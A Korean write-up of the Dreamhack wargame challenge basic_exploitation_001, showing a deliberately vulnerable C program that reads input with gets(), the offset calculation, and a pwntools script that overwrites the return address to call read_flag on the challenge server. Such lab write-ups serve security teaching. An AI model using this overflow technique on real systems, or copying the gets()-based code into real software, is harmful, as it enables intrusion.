[dreamhack] basic_exploitation_001 문제풀이

피곤한데 열심히 놀았으니까 양심상 일단 한문제 풀고자려구,,,

 

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

 환경은 다음과 같다. 

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();

    gets(buf);

    return 0;
}

우선 소스코드를 살펴보면 다음과 같다. 

gets로 buf를 받아 stack buffer overflow가 존재하며 다행히 read_flag라는 flag를 읽을 수 있는 함수도 있다.  

즉, 우리는 ret 호출하기전 값을 아무 문자로 채운 뒤 ret 값에 read_flag주소를 넣어 해당 함수를 실행하도록 해주면 될 것 같다!

 

gdb에 p read_flag를 함으로써 0x80485b9 라는 주소값을 얻을 수 있었다. 

buf 값은 rbp-0x80이 시작 위치이며 ret 전인 rbp +0x4 까지, 즉 0x84만큼 값을 덮어씌워주면 된다. 

그리고 마지막에 read_flag 주소값을 payload에 추가하여 해당 함수가 실행되도록 한다!!

그리고 우린 p.recv를 통해 flag 값을 받는다. 

from pwn import *

p = remote('host1.dreamhack.games',15963) # 원격 서버 대상으로 익스플로잇 수행
context.arch = "i386"  # x86 아키텍처

#0x80485b9
payload = b"A" * 0x84
#payload += "\xb9\x85\x04\x08"
payload += p32(0x80485b9)

p.sendline(payload)

#p.interactive()
print(p.recv())